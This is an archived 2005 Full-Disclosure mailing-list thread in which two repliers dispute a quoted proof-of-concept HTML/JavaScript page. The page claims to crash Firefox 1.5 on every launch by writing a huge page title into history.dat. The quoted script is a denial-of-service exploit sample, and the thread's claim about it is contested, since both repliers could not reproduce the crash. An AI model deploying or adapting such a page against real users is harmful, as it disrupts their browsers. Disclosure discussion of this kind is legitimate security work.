Message-ID: <43985D2F.9040902@valhallalegends.com>
Date: Thu Dec 8 16:22:01 2005
From: iago at valhallalegends.com (Ron)
Subject: re: Firefox 1.5 buffer overflow (poc)
I was also unable to replicate it on Firefox 1.5 i386 Linux EN
ad@...poverflow.com wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Neither a fake, nor do you really know what a buffer overflow is, but for
> sure here on my Firefox 1.5 EN the client takes much longer to load at
> the next boot, but it reloads fine without exceptions and there is
> nothing about a security bug here...
>
>
>> <!-- Firefox 1.5 buffer overflow
>>
>> Basically Firefox logs all kinds of URL data in its history.dat file;
>> this little script will set a really large topic and Firefox will then
>> save that topic into its history.dat. The next time that Firefox is
>> opened, it will instantly crash due to a buffer overflow -- this will
>> happen every time until you manually delete the history.dat file -- which
>> most users won't figure out.
>>
>> This proof of concept will only prevent someone from reopening
>> their browser after being exploited. DoS if you will. However, code
>> execution is possible with some modifications.
>>
>> Tested with Firefox 1.5 on Windows XP SP2.
>>
>> ZIPLOCK <sickbeatz@...il.com>
>>
>> -->
>> <html><head><title>heh</title><script type="text/javascript">
>> function ex() {
>>   // Build a 5000-character string of "A"s.
>>   var buffer = "";
>>   for (var i = 0; i < 5000; i++) {
>>     buffer += "A";
>>   }
>>   // Append it 500 more times: 5000 + 500 * 5000 = 2,505,000 characters.
>>   var buffer2 = buffer;
>>   for (i = 0; i < 500; i++) {
>>     buffer2 += buffer;
>>   }
>>   // The oversized title is what Firefox persists into history.dat.
>>   document.title = buffer2;
>> }
>> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
>> </a></body></html>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> IFxjTMn8Sc0=
> =SX09
> -----END PGP SIGNATURE-----
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>